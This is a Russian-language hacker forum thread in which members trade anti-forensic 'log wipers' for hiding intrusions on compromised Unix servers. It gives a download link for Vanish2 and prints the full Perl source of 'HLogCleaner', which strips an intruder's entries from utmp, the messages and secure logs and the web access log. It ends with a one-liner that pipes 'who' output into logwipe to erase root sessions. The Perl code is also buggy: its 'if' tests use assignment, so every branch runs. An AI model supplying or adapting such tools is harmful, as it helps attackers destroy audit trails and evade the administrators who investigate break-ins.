Собственно сабж.
Я обычно использую Vanish2, но у каждого логвайпера есть сови минусы и плюсы.
Хочу знать мнение остальных.
Кроме того, тема будет полезна для тех, кто логи НЕ чистит ))

Аналогично ванишем)

Юзаю тож ваниш.
Фряхи и т.д не рутал,логвайперов под них не юзал.

Ванишь использую. Пока лучше не чего не видел.

Для приличия ссылочку на ваниш бы скинули =))

Vanish2 (http://nsd.ru/soft/1/anonimus/vanish2.tgz)

#!/usr/bin/perl
# ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' '
# ' HATS Security Team http://security.nitro.ru '
# ' '
# ' HLogCleaner [hlogcleaner_0.1_pub.rar] '
# ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' '
# ' [v 0.1 public] '
# ' '
# ' Copyright © 2005-2006 Dmitri Gavrilov '
# ' '
# ' Released under the terms & conditions of v2 of the GNU General '
# ' Public License. For details refer visit http://gnu.org '
# ' '
# ' [version 0.1] >> Первый релиз '
# ' '
# ' <info> '
# ' Программа для очистки бинарных и текстовых лог-файлов '
# ' '
# ' Coded by GeW [zionix@mail.ru] '
# ' Greets to all HATS Security Team members '
# ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' '
use Getopt::Std;
use Socket;
if (@ARGV < 1) { &help; }
getopt("uh");
if ($ARGV[0] = "1")
{
print "\n[ start cleaning ]\n";
binary("/var/run/utmp");
print "[ stop cleaning ]\n";
}
if ($ARGV[0] = "2")
{
print "\n[ start cleaning ]\n";
ascii("/var/log/messages");
print "[ stop cleaning ]\n";
}
if ($ARGV[0] = "3")
{
print "\n[ start cleaning ]\n";
ascii("/var/log/secure");
print "[ stop cleaning ]\n";
}
if ($ARGV[0] = "4")
{
print "\n[ start cleaning ]\n";
ascii("/usr/local/www/logs/access_log");
print "[ stop cleaning ]\n";
}
if ($ARGV[0] = "5")
{
print "\n[ start cleaning ]\n";
binary("/var/run/utmp");
ascii("/var/log/messages");
ascii("/var/log/secure");
ascii("/usr/local/www/logs/access_log");
print "[ stop cleaning ]\n";
}
sub binary
{
use User::Utmp qw(utmpname getut putut);
$file = shift;
utmpname($file);
@utmp = getut();
open(TMP,">/tmp/.tmp");
close(TMP);
utmpname("/tmp/.tmp");
foreach $entry (@utmp)
{
putut($entry)
if ($entry->{"ut_user"} ne $opt_u && $entry->{"ut_host"} ne $opt_h);
}
system("mv /tmp/.tmp $file");
return 1;
}
sub ascii
{
$file = shift;
open(READ,"$file");
open(WRITE,">/tmp/.tmp");
while(<READ>)
{
print WRITE $_
if ($_!~/$opt_h/);
}
system("mv /tmp/.tmp $file");
}
sub help
{
print "\n";
print (<<"end");
================================================== =================
HATS Log Cleaner [version 0.1 public]
Coded by GeW [zionix@mail.ru]
Greets to all HATS Security Team members
usage: perl hlogcleaner.pl <cleaning type>
types: 1 - /var/run/utmp [binary]
2 - /var/log/messages [ascii]
3 - /var/log/secure [ascii]
4 - /usr/local/www/logs/access_log [ascii]
5 - all cleaning types
example: perl hlogcleaner.pl 5
================================================== =================
end
exit();
}


=======================

много багов, но работа над ним кипит=)

Использую только всои чистильщики

руками

Fashion
Тогда давай подробнее - все кругом сгорают от любопытства :)))

Fashion
Тогда давай подробнее - все кругом сгорают от любопытства :)))
Да,мне чесное слово тоже очень интересно...
Мы ведь лохи-юзаем логклинеры...
Настоящие Х всё делают руками.

Я вот тут случайно наткнулся на статью о логвайперах.
read (http://www.xakep.ru/magazine/xs/032/062/1.asp)

я юзаю от XasClan'a

Да,мне чесное слово тоже очень интересно...
Мы ведь лохи-юзаем логклинеры...
Настоящие Х всё делают руками.

Да ты прав б/п.
Посмотри мою статейку про очистку бинарных логов /var/run/utmp, /var/log/lastlog и /var/log/wtmp в разделе статьи...Там еще исходник есть неболшой проги, которая не только удаляет необоходимую запись, но и меняет дату изменения файла. Вот ссыла на статью http://forum.antichat.ru/thread15355.html

Юзаю логвайпер от лимпомпо, на своем велосипеде кататься приятней, так сказать.

Вантусом подчищаю, т.к больше нечего не юзал.

Народ Vanish хорошая штука но иногда она почему то не работает(не надо говорить что chmod не с тем битом, дело не в этом ... есть ядра 2.4 которые не ломаются) - дак вот на такой случай Альтернатива это Stealth - бинраный и текстовой. Последнее время юзаю только его.

юзаю логвайпер от rent0n, ему требуются параметры:

logwipe <name> <host> <terminal>
Соотв-щие <name> <host> <terminal> я получаю такой командой:
who | awk '/root/{sub(/\(/,""); sub(/\)/,"");print $1, $5, $2}'

Теперь вопрос, можно ли как-нибудь эти команды объединить в одну строку?

who | awk '/root/{sub(/\(/,""); sub(/\)/,"");print $1, $5, $2}' | logwipe - не работает. Как вывод моей конструкции подать как параметры для запуска logwipe?

Сейчас юзаю cron, раньше - ручками.

who | awk '/root/{sub(/\(/,""); sub(/\)/,"");print $1, $5, $2}' | logwipe - не работает. Как вывод моей конструкции подать как параметры для запуска logwipe?

# logwipe `who | awk '/root/{sub(/\(/,""); sub(/\)/,"");print $1, $5, $2}' `